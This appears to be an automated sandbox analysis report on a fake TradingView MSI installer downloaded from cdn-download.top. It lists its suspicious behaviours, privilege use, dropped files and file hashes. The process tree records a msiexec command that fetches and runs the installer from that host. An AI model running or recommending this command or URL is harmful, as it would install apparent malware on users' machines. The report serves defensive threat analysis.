Analysis
-
max time kernel
505s -
max time network
508s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2023 11:37
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://cdn-download.top/TradingView_setup.msi
Resource
win10v2004-20220812-en
General
-
Target
http://cdn-download.top/TradingView_setup.msi
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 5 3664 msiexec.exe -
Loads dropped DLL 6 IoCs
Processes:
MsiExec.exepid process 1096 MsiExec.exe 1096 MsiExec.exe 1096 MsiExec.exe 1096 MsiExec.exe 1096 MsiExec.exe 1096 MsiExec.exe -
Unknown use of msiexec with remote resource 1 IoCs
Processes:
msiexec.exepid process 3664 msiexec.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Drops file in Windows directory 1 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI86E8.tmp msiexec.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 3664 msiexec.exe Token: SeIncreaseQuotaPrivilege 3664 msiexec.exe Token: SeRestorePrivilege 3664 msiexec.exe Token: SeTakeOwnershipPrivilege 3664 msiexec.exe Token: SeSecurityPrivilege 3896 msiexec.exe Token: SeCreateTokenPrivilege 3664 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3664 msiexec.exe Token: SeLockMemoryPrivilege 3664 msiexec.exe Token: SeIncreaseQuotaPrivilege 3664 msiexec.exe Token: SeMachineAccountPrivilege 3664 msiexec.exe Token: SeTcbPrivilege 3664 msiexec.exe Token: SeSecurityPrivilege 3664 msiexec.exe Token: SeTakeOwnershipPrivilege 3664 msiexec.exe Token: SeLoadDriverPrivilege 3664 msiexec.exe Token: SeSystemProfilePrivilege 3664 msiexec.exe Token: SeSystemtimePrivilege 3664 msiexec.exe Token: SeProfSingleProcessPrivilege 3664 msiexec.exe Token: SeIncBasePriorityPrivilege 3664 msiexec.exe Token: SeCreatePagefilePrivilege 3664 msiexec.exe Token: SeCreatePermanentPrivilege 3664 msiexec.exe Token: SeBackupPrivilege 3664 msiexec.exe Token: SeRestorePrivilege 3664 msiexec.exe Token: SeShutdownPrivilege 3664 msiexec.exe Token: SeDebugPrivilege 3664 msiexec.exe Token: SeAuditPrivilege 3664 msiexec.exe Token: SeSystemEnvironmentPrivilege 3664 msiexec.exe Token: SeChangeNotifyPrivilege 3664 msiexec.exe Token: SeRemoteShutdownPrivilege 3664 msiexec.exe Token: SeUndockPrivilege 3664 msiexec.exe Token: SeSyncAgentPrivilege 3664 msiexec.exe Token: SeEnableDelegationPrivilege 3664 msiexec.exe Token: SeManageVolumePrivilege 3664 msiexec.exe Token: SeImpersonatePrivilege 3664 msiexec.exe Token: SeCreateGlobalPrivilege 3664 msiexec.exe Token: SeCreateTokenPrivilege 3664 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3664 msiexec.exe Token: SeLockMemoryPrivilege 3664 msiexec.exe Token: SeIncreaseQuotaPrivilege 3664 msiexec.exe Token: SeMachineAccountPrivilege 3664 msiexec.exe Token: SeTcbPrivilege 3664 msiexec.exe Token: SeSecurityPrivilege 3664 msiexec.exe Token: SeTakeOwnershipPrivilege 3664 msiexec.exe Token: SeLoadDriverPrivilege 3664 msiexec.exe Token: SeSystemProfilePrivilege 3664 msiexec.exe Token: SeSystemtimePrivilege 3664 msiexec.exe Token: SeProfSingleProcessPrivilege 3664 msiexec.exe Token: SeIncBasePriorityPrivilege 3664 msiexec.exe Token: SeCreatePagefilePrivilege 3664 msiexec.exe Token: SeCreatePermanentPrivilege 3664 msiexec.exe Token: SeBackupPrivilege 3664 msiexec.exe Token: SeRestorePrivilege 3664 msiexec.exe Token: SeShutdownPrivilege 3664 msiexec.exe Token: SeDebugPrivilege 3664 msiexec.exe Token: SeAuditPrivilege 3664 msiexec.exe Token: SeSystemEnvironmentPrivilege 3664 msiexec.exe Token: SeChangeNotifyPrivilege 3664 msiexec.exe Token: SeRemoteShutdownPrivilege 3664 msiexec.exe Token: SeUndockPrivilege 3664 msiexec.exe Token: SeSyncAgentPrivilege 3664 msiexec.exe Token: SeEnableDelegationPrivilege 3664 msiexec.exe Token: SeManageVolumePrivilege 3664 msiexec.exe Token: SeImpersonatePrivilege 3664 msiexec.exe Token: SeCreateGlobalPrivilege 3664 msiexec.exe Token: SeCreateTokenPrivilege 3664 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
msiexec.exepid process 3664 msiexec.exe 3664 msiexec.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
msiexec.exedescription pid process target process PID 3896 wrote to memory of 1096 3896 msiexec.exe MsiExec.exe PID 3896 wrote to memory of 1096 3896 msiexec.exe MsiExec.exe PID 3896 wrote to memory of 1096 3896 msiexec.exe MsiExec.exe
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I http://cdn-download.top/TradingView_setup.msi1⤵
- Blocklisted process makes network request
- Unknown use of msiexec with remote resource
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 76AB742682231C35C5F5C0CBF218F3AA C2⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MSI1D6C.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI1D6C.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI205B.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI205B.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI2108.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI2108.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI2167.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI2167.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI2187.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI2187.tmpFilesize
377KB
MD5af61221c6f4e9ab3ac2440b25d751868
SHA1094f68ff354ac4c8dbdfe4689cb821f8d25880b8
SHA2561e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8
SHA512c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791
-
C:\Users\Admin\AppData\Local\Temp\MSI22A1.tmpFilesize
837KB
MD5e76f80f8c9a51813813c351e35bf0755
SHA1ec69253f3fd681d2829d60f3a14a48c779fabbb4
SHA25687388281ef2eb907b4ad843c8bc0e3ec13dae903edfe53b29f78557588eb5161
SHA512134a7be4012dc52763e5ac28eed7ce8e423a913f17449a672ce9f1192e69e5e00c62bce1f0374f76443832345eded1668f28fb9fbe7d287fc51dfdc199911dc5
-
C:\Users\Admin\AppData\Local\Temp\MSI22A1.tmpFilesize
837KB
MD5e76f80f8c9a51813813c351e35bf0755
SHA1ec69253f3fd681d2829d60f3a14a48c779fabbb4
SHA25687388281ef2eb907b4ad843c8bc0e3ec13dae903edfe53b29f78557588eb5161
SHA512134a7be4012dc52763e5ac28eed7ce8e423a913f17449a672ce9f1192e69e5e00c62bce1f0374f76443832345eded1668f28fb9fbe7d287fc51dfdc199911dc5
-
memory/1096-132-0x0000000000000000-mapping.dmp